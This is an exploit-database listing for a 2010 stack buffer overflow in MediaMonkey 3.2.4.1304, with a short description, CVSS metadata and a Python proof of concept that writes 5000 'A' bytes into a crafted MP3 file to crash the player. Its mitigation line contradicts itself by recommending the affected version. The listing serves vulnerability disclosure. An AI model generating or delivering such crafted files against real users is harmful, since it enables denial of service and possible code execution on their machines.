header-logo
Suggest Exploit
vendor:
Mediamonkey
by:
0v3r
7,5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Mediamonkey
Affected Version From: 3.2.4.1304
Affected Version To: 3.2.4.1304
Patch Exists: YES
Related CWE: N/A
CPE: a:ventis_media:mediamonkey
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3 EN
2010

Mediamonkey 3.2.4.1304 (mp3) Buffer Overflow Vulnerability PoC

A buffer overflow vulnerability exists in Mediamonkey 3.2.4.1304, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially allow the execution of arbitrary code. The vulnerability is caused due to a boundary error when processing MP3 files with an overly long string. This can be exploited to cause a stack-based buffer overflow via an overly long string passed to a specially crafted MP3 file.

Mitigation:

Upgrade to the latest version of Mediamonkey 3.2.4.1304 or later.
Source

Exploit-DB raw data:

# Exploit Title: Mediamonkey 3.2.4.1304 (mp3) Buffer Overflow Vulnerability PoC
# Date: 12/04/2010
# Author: 0v3r
# Software Link: http://www.mediamonkey.com/download/?dir=download
# Version: 3.2.4.1304
# Tested on: Windows XP SP3 EN
# CVE: N/A


#!/usr/bin/python

buff = "\x41" * 5000 

try:
 	f = open("exploit.mp3",'w')
	f.write(buff)
	f.close()
	print "[-] File created!\n" 
except:
	print "[-] Error occured!\n"

Navigation

Suggest Exploit

Services By CQR